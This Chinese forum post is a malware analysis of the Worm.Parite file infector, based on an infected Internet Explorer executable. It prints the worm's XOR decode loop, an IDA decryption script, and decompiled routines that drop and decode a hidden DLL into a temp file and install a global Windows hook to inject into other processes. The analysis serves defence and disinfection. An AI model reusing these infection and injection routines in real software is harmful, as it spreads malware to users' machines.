【文章标题】: Worm.Parite.Residented 详细分析+专杀工具src
【文章作者】: Azure[LCG]
【作者邮箱】: Azure@52pojie.cn
【作者QQ号】: 325002492
【加壳方式】: UPX
【编写语言】: BC++
【使用工具】: IDA、OD
【操作平台】: Win7+WinXP Sp3(VM)
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
--------------------------------------------------------------------------------
【详细过程】
完蛋了……看来我的计算机水平还是菜鸟等级的,装着自己很懂似的,不装杀软,裸奔,导致今天在干伤天害理的事情的时候被病毒感染,全盘exe文件除了最核心的系统文件无一幸免。
这个专杀只是把文件的病毒区段数据填0,然后修改入口点,但是文件大小还是没恢复回去……因为感染数量相当巨大……这只是D盘的= =郁闷啊……
留下一个图片
我欠回炉重造了……唉。。。
下次再也不敢帮别人盗版了……= =
------------------------------------------------------------------------------------------------------------------
以上为去年10月1感染病毒当天的吐嘈
彻底败掉了啊……败给了一个2001年10月7日写的病毒……- -囧爆肝,既然经历了这么多年的时光还能在网络上进行传染,就说明很有分析的必要吧……
当然现在的杀毒软件都可以干掉的、打破了我两年裸奔不中毒的记录啊……- -唉。
好吧……现在开始拆它。
以感染的InternetExplore为例(版本号6.0.2900.5512)
感染后明显多出一段
对比感染前后PE头
我们先来分析被感染程序的Loader
用到的IDA里的解码脚本
- -其实渣质量的.
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]eax[/color][/color], 0EAB8D[color=#008000]//decode key[/color]
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]edx[/color][/color], 0041901C[color=#008000]//解码起始位置[/color]
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]esi[/color][/color], 598[color=#008000]//固定大小[/color]
L007:
[color=#0000D0][color=#0000D0]xor[/color][/color] [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]edx[/color][/color]+[color=#FF0000][color=#FF0000]esi[/color][/color]], [color=#FF0000][color=#FF0000]eax[/color][/color]
[color=#0000D0][color=#0000D0]dec[/color][/color] [color=#FF0000][color=#FF0000]esi[/color][/color]
[color=#0000D0][color=#0000D0]sub[/color][/color] [color=#FF0000][color=#FF0000]esi[/color][/color], 3
[color=#0000D0][color=#0000D0]jnz[/color][/color] L007
[color=#0000D0]#include[/color] <idc.idc>
[color=#0000D0]static[/color] decrypt([color=#b000b0]end[/color], key)
{
[color=#0000D0]auto[/color] i, x[color=#008000];[/color]
[color=#b000b0]end[/color]=[color=#b000b0]end[/color]+0x598[color=#008000];[/color]
[color=#0000D0]for[/color] (i=0x598[color=#008000];i!=0;i=i-4)[/color]
{
x=[color=#b000b0]Dword[/color]([color=#b000b0]end[/color])[color=#008000];[/color]
x= (x^key)[color=#008000];[/color]
PatchDword([color=#b000b0]end[/color],x)[color=#008000];[/color]
[color=#b000b0]end[/color] = [color=#b000b0]end[/color] - 4[color=#008000];[/color]
}
}
.qnk_:0041901C [color=#0000D0][color=#0000D0]jnz[/color][/color] [color=#0000D0]short[/color] loc_419013
.qnk_:0041901E [color=#0000D0][color=#0000D0]nop[/color][/color]
.qnk_:0041901F [color=#0000D0][color=#0000D0]nop[/color][/color]
.qnk_:00419020 [color=#0000D0][color=#0000D0]call[/color][/color] main
.qnk_:00419020 DecodeProc [color=#b000b0]endp[/color]
.qnk_:00419020
.qnk_:00419020 [color=#008000]; ---------------------------------------------------------------------------[/color]
00419020 00017DE8 [color=#0000D0]CALL[/color]
00419024 00000000------------------------------------------------
00419028 00400000 IEXPLORE.00400000[color=#008000];下面一砣是原程序和病毒体信息[/color]
0041902C 00002451 +0x0C OEP RVA
00419030 00016C00 +0x10 原大小
00419034 000171D6 +0x14 加密病毒Dll偏移
00419038 0002AA00 +0x18 病毒Dll大小
0041903C 00000000
00419040 00401000 +0x20 <&KERNEL32.LoadLibraryA>
00419044 00402B4C +0x24 ASCII [color=#808080][color=#808080]"UnhandledExceptionFilter"[/color][/color]
00419048 00402AE2 +0x28 ASCII [color=#808080][color=#808080]"GetCommandLineA"[/color][/color]
0041904C 00001AEC
00419050 00002B4A +0x30 被替换掉的第一个IAT Thunk
00419054 00002AE0 +0x34 被替换掉的第二个IAT Thunk - -插一句,其实如果我早就注意到这里的话专杀的代码可以直接用这个数据、还能省掉减掉基址那一步……嘛,算了,反正效果一样、懒得去改了
00419058 00000400
0041905C 7C863E6A kernel32.[b][color=#000080]UnhandledExceptionFilter[/color][/b][color=#008000]; 被替换掉的Kernel32前两个函数[/color]
00419060 7C812FAD kernel32.GetCommandLineA
[color=#0000D0][color=#0000D0]push[/color][/color] [color=#FF0000][color=#FF0000]ebp[/color][/color]
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]ebp[/color][/color], [color=#FF0000][color=#FF0000]esp[/color][/color]
[color=#0000D0][color=#0000D0]add[/color][/color] [color=#FF0000][color=#FF0000]esp[/color][/color], -140
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]eax[/color][/color], [color=#FF0000][color=#FF0000]ebp[/color][/color]
[color=#0000D0][color=#0000D0]add[/color][/color] [color=#FF0000][color=#FF0000]eax[/color][/color], 4 [color=#008000]; [color=#FF0000]eax[/color]=DATA after [color=#0000D0]call[/color][/color]
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]edx[/color][/color], [color=#FF0000][color=#FF0000]ebp[/color][/color]
[color=#0000D0][color=#0000D0]push[/color][/color] [color=#FF0000][color=#FF0000]ebx[/color][/color]
[color=#0000D0][color=#0000D0]push[/color][/color] [color=#FF0000][color=#FF0000]esi[/color][/color]
[color=#0000D0][color=#0000D0]push[/color][/color] [color=#FF0000][color=#FF0000]edi[/color][/color]
[color=#0000D0][color=#0000D0]xor[/color][/color] [color=#FF0000][color=#FF0000]ebx[/color][/color], [color=#FF0000][color=#FF0000]ebx[/color][/color]
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]edi[/color][/color], [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]eax[/color][/color]] [color=#008000]; [color=#FF0000]edi[/color]=DATA[/color]
[color=#0000D0][color=#0000D0]lea[/color][/color] [color=#FF0000][color=#FF0000]ecx[/color][/color], [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]ebp[/color][/color]-38]
[color=#0000D0][color=#0000D0]sub[/color][/color] [color=#FF0000][color=#FF0000]edi[/color][/color], 5 [color=#008000]; CALL addr[/color]
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]eax[/color][/color], [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]edi[/color][/color]+C] [color=#008000]; [color=#FF0000]eax[/color]=oep rva[/color]
[color=#0000D0][color=#0000D0]lea[/color][/color] [color=#FF0000][color=#FF0000]esi[/color][/color], [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]edi[/color][/color]+84] [color=#008000]; [color=#FF0000]esi[/color]=lpKernel32_dll[/color]
[color=#0000D0][color=#0000D0]add[/color][/color] [color=#FF0000][color=#FF0000]eax[/color][/color], [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]edi[/color][/color]+8] [color=#008000]; [[color=#FF0000]edi[/color]+8]base addr[/color]
[color=#0000D0][color=#0000D0]add[/color][/color] [color=#FF0000][color=#FF0000]edx[/color][/color], 4
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]edx[/color][/color]], [color=#FF0000][color=#FF0000]eax[/color][/color] [color=#008000]; 返回地址=oep[/color]
[color=#0000D0][color=#0000D0]push[/color][/color] [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]eax[/color][/color]+24]
[color=#0000D0][color=#0000D0]push[/color][/color] hKernel32
[color=#0000D0][color=#0000D0]call[/color][/color] [b][color=#000080][b][color=#000080]GetProcAddress[/color][/b][/color][/b]
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]edx[/color][/color], [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]ebp[/color][/color]+C]
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]ecx[/color][/color], [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]edx[/color][/color]+20]
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]ecx[/color][/color]], [color=#FF0000][color=#FF0000]eax[/color][/color]
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]eax[/color][/color], [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]ebp[/color][/color]+C]
[color=#0000D0][color=#0000D0]push[/color][/color] [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]eax[/color][/color]+28]
[color=#0000D0][color=#0000D0]push[/color][/color] hKernel32
[color=#0000D0][color=#0000D0]call[/color][/color] [b][color=#000080][b][color=#000080]GetProcAddress[/color][/b][/color][/b]
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]edx[/color][/color], [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]ebp[/color][/color]+C]
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#FF0000][color=#FF0000]ecx[/color][/color], [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]edx[/color][/color]+20]
[color=#0000D0][color=#0000D0]add[/color][/color] [color=#FF0000][color=#FF0000]ecx[/color][/color], 4
[color=#0000D0][color=#0000D0]mov[/color][/color] [color=#b000b0]dword[/color] [color=#b000b0]ptr[/color] [[color=#FF0000][color=#FF0000]ecx[/color][/color]], [color=#FF0000][color=#FF0000]eax[/color][/color]
bool [color=#0000D0]__stdcall[/color] IsInfected([color=#0000D0][color=#0000D0]int[/color][/color] a1, [color=#0000D0][color=#0000D0]int[/color][/color] a2, [color=#0000D0][color=#0000D0]int[/color][/color] a3)
{
[color=#b000b0][color=#0000D0]if[/color][/color] ( ![b][color=#000080][b][color=#000080]RegOpenKeyEx[/color][/b][/color][/b](HKEY_CURRENT_USER,
a3 + 189, [color=#008000]// Software\Microsoft\Windows\CurrentVersion\Explorer[/color]
0,
KEY_READ,
&hKey) )
{
bInfected = (*([color=#0000D0][color=#0000D0]int[/color][/color] ([color=#0000D0]__stdcall[/color] **)([color=#0000D0]HKEY[/color], [color=#0000D0][color=#0000D0]int[/color][/color], _DWORD, _DWORD, [color=#0000D0][color=#0000D0]int[/color][/color], [color=#0000D0][color=#0000D0]int[/color][/color] *))(a2 + 48))(hKey, a3 + 240, 0, 0, a1, &v5) == 0[color=#008000];[/color]
(*([color=#0000D0]void[/color] ([color=#0000D0]__stdcall[/color] **)([color=#0000D0]HKEY[/color]))(a2 + 52))(hKey)[color=#008000];[color=#008000]// RegQueryKeyValueExA(X,PINF...)[/color][/color]
[color=#008000]//病毒核心Dll的文件位置[/color]
}
[color=#0000D0]return[/color] bInfected[color=#008000];[/color]
}
[color=#0000D0]char[/color] ExpandVirus([color=#0000D0][color=#0000D0]int[/color][/color] a1<[color=#FF0000][color=#FF0000]ebx[/color][/color]>, [color=#0000D0][color=#0000D0]int[/color][/color] a2<[color=#FF0000][color=#FF0000]edi[/color][/color]>, [color=#0000D0][color=#0000D0]int[/color][/color] a3<[color=#FF0000][color=#FF0000]esi[/color][/color]>, [color=#0000D0][color=#0000D0]int[/color][/color] a4, [color=#0000D0][color=#0000D0]int[/color][/color] a5, [color=#0000D0][color=#0000D0]int[/color][/color] a6)
{
GetModuleFileNameA(0, &v12, MAX_PATH, a2, a3, a1)[color=#008000];[/color]
hFile = CreateFileA(&v12,GENERIC_READ,1,0,3,1,0)[color=#008000];[/color]
[color=#b000b0][color=#0000D0]if[/color][/color] ( hFile == -1 )
{
BYTE3(v16) = 0[color=#008000];[/color]
}
[color=#b000b0][color=#0000D0]else[/color][/color]
{
GetTempPathA(MAX_PATH, &v12)[color=#008000];[/color]
v15 = [b][color=#000080][b][color=#000080]GetTickCount[/color][/b][/color][/b]()[color=#008000]; [color=#008000]//生成随机文件名[/color][/color]
v7 = 0[color=#008000];[/color]
[color=#0000D0]do[/color]
{
v8 = *((_BYTE *)&v15 + v7)[color=#008000];[/color]
*((_BYTE *)&v15 + v7++) = v8 / 10 + 97[color=#008000];[/color]
}
[color=#0000D0]while[/color] ( v7 <= 2 )[color=#008000];[/color]
BYTE3(v15) = 0[color=#008000];[/color]
GetTempFileNameA(&v15, v8 % 10, &v12, &v15, 0, a4)[color=#008000];[/color]
v14 = CreateFileA(a4,GENERIC_WRITE|GENERIC_READ,1,0,2,128,0)[color=#008000];[/color]
[color=#b000b0][color=#0000D0]if[/color][/color] ( v14 == -1 )
{
BYTE3(v16) = 0[color=#008000];[/color]
}
[color=#b000b0][color=#0000D0]else[/color][/color]
{ [color=#008000]// 每次解码10KB病毒DLL,然后写完了继续解[/color]
v9 = *(_DWORD *)(a6 + 24)[color=#008000];[/color]
(*([color=#0000D0]void[/color] ([color=#0000D0]__stdcall[/color] **)([color=#0000D0][color=#0000D0]int[/color][/color], _DWORD, _DWORD, _DWORD))(a5 + 28))(hFile, *(_DWORD *)(a6 + 20), 0, 0)[color=#008000];[color=#008000]// SetFilePoint[/color][/color]
[color=#0000D0]for[/color] ( [color=#008000]; v9 > 0x2800; v9 -= 10240 )[/color]
{
(*([color=#0000D0]void[/color] ([color=#0000D0]__stdcall[/color] **)([color=#0000D0][color=#0000D0]int[/color][/color], [color=#0000D0]char[/color] *, [color=#0000D0]signed[/color] [color=#0000D0][color=#0000D0]int[/color][/color], [color=#0000D0]char[/color] *, _DWORD))(a5 + 20))(hFile, &v11, 10240, &v13, 0)[color=#008000];[color=#008000]// ReadFile[/color][/color]
Decode2(*(_DWORD *)(a6 + 128), &v11, 10240)[color=#008000];[color=#008000]// 解码病毒DLL[/color][/color]
(*([color=#0000D0]void[/color] ([color=#0000D0]__stdcall[/color] **)([color=#0000D0][color=#0000D0]int[/color][/color], [color=#0000D0]char[/color] *, [color=#0000D0]signed[/color] [color=#0000D0][color=#0000D0]int[/color][/color], [color=#0000D0]char[/color] *, _DWORD))(a5 + 24))(v14, &v11, 10240, &v13, 0)[color=#008000];[/color]
}
(*([color=#0000D0]void[/color] ([color=#0000D0]__stdcall[/color] **)([color=#0000D0][color=#0000D0]int[/color][/color], [color=#0000D0]char[/color] *, [color=#0000D0]unsigned[/color] [color=#0000D0][color=#0000D0]int[/color][/color], [color=#0000D0]char[/color] *, _DWORD))(a5 + 20))(hFile, &v11, v9, &v13, 0)[color=#008000];[color=#008000]// [/color][/color]
[color=#008000]// - -解码最后一块,完事擦屁股[/color]
Decode2(*(_DWORD *)(a6 + 128), &v11, v9)[color=#008000];[/color]
(*([color=#0000D0]void[/color] ([color=#0000D0]__stdcall[/color] **)([color=#0000D0][color=#0000D0]int[/color][/color], [color=#0000D0]char[/color] *, [color=#0000D0]unsigned[/color] [color=#0000D0][color=#0000D0]int[/color][/color], [color=#0000D0]char[/color] *, _DWORD))(a5 + 24))(v14, &v11, v9, &v13, 0)[color=#008000];[/color]
(*([color=#0000D0]void[/color] ([color=#0000D0]__stdcall[/color] **)([color=#0000D0][color=#0000D0]int[/color][/color]))(a5 + 32))(v14)[color=#008000];[/color]
BYTE3(v16) = 1[color=#008000];[/color]
}
[b][color=#000080][b][color=#000080]CloseHandle[/color][/b][/color][/b](hFile)[color=#008000];[/color]
}
[color=#0000D0]return[/color] BYTE3(v16)[color=#008000];[/color]
}
[color=#0000D0]char[/color] [color=#0000D0]__stdcall[/color] InitVirusDll([color=#0000D0][color=#0000D0]int[/color][/color] a1, [color=#0000D0][color=#0000D0]int[/color][/color] a2, [color=#0000D0][color=#0000D0]int[/color][/color] a3, [color=#0000D0][color=#0000D0]int[/color][/color] a4)
{
v4 = (*([color=#0000D0][color=#0000D0]int[/color][/color] ([color=#0000D0]__stdcall[/color] **)([color=#0000D0][color=#0000D0]int[/color][/color]))a2)(a1)[color=#008000]; [color=#008000]// - -Load从输入表里得到的病毒路径[/color][/color]
[color=#0000D0]return[/color] v4
&& (v5 = (*([color=#0000D0][color=#0000D0]int[/color][/color] ([color=#0000D0]__stdcall[/color] **)([color=#0000D0][color=#0000D0]int[/color][/color], [color=#0000D0][color=#0000D0]int[/color][/color]))(a2 + 4))(v4, a4 + 245)) != 0[color=#008000]// [b][color=#000080]GetProcAddress[/color][/b](Initiate)[/color]
&& ([color=#0000D0]unsigned[/color] [color=#0000D0]__int8[/color])(([color=#0000D0][color=#0000D0]int[/color][/color] ([color=#0000D0]__stdcall[/color] *)([color=#0000D0][color=#0000D0]int[/color][/color]))v5)(a3)[color=#008000];[color=#008000]// Initiate(Addr)[/color][/color]
[color=#008000]// 这里Addr是一开始DecodeProc执行完以后那个Call的地址[/color]
[color=#008000]// 00419020 E8 7D010000 [color=#0000D0]call[/color] 004191A2[/color]
[color=#008000]// Loader分析告一段落。下面继续Dll分析[/color]
}
[color=#0000D0]char[/color] [color=#0000D0]__cdecl[/color] Initiate([color=#0000D0][color=#0000D0]int[/color][/color] a1)
{
hMutex = OpenMutexA(MUTEX_ALL_ACCESS, 0, [color=#808080][color=#808080]"Residented"[/color][/color])[color=#008000];[/color]
[color=#b000b0][color=#0000D0]if[/color][/color] ( !hMutex || (result = sub_4019A8(v4, ([color=#0000D0][color=#0000D0]int[/color][/color])&v3, 262)) != 0 && v3 < 7u && v3 >= 2u )
result = ([color=#0000D0]unsigned[/color] [color=#0000D0][color=#0000D0]int[/color][/color])SetWindowsHookExA(WH_CALLWNDPROC, ([color=#0000D0]HOOKPROC[/color])AttachHook, *([color=#0000D0]HINSTANCE[/color] *)off_459938[0], 0)[color=#008000];[color=#008000]// 放钩子,咬人[/color][/color]
[color=#008000]// 全局钩子,注入N多有CALLWNDPROC的进程[/color]
[color=#008000]// 感谢气泡熊的解答^_^[/color]
[color=#b000b0][color=#0000D0]if[/color][/color] ( hMutex )
result = [b][color=#000080][b][color=#000080]CloseHandle[/color][/b][/color][/b](hMutex)[color=#008000];[/color]
[color=#b000b0][color=#0000D0]if[/color][/color] ( !v8 )
{
v7 = 8[color=#008000];[/color]
v9 = v4[color=#008000];[/color]
[color=#b000b0][color=#0000D0]if[/color][/color] ( v4 )
{
v10 = *(_DWORD *)v9[color=#008000];[/color]
v7 = 56[color=#008000];[/color]
result = (*([color=#0000D0][color=#0000D0]int[/color][/color] ([color=#0000D0]__fastcall[/color] **)([color=#0000D0][color=#0000D0]int[/color][/color], [color=#0000D0]signed[/color] [color=#0000D0][color=#0000D0]int[/color][/color]))(*(_DWORD *)v9 - 4))(v9, 3)[color=#008000];[color=#008000]// call ika1.008FC65C[/color][/color]
[color=#008000]// CleanUp[/color]
v7 = 44[color=#008000];[/color]
}
[color=#b000b0][color=#0000D0]if[/color][/color] ( !v8 )
result = v6[color=#008000];[/color]
}
[color=#0000D0]return[/color] result[color=#008000];[/color]
}
0012FCF0 00000004 |HookType = WH_CALLWNDPROC
0012FCF4 008F1EBC |Hookproc = [color=#b000b0]offset[/color] ika1.AttachHook
0012FCF8 008F0000 |hModule = 008F0000 (ika1)
0012FCFC 00000000 \ThreadID = 0
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课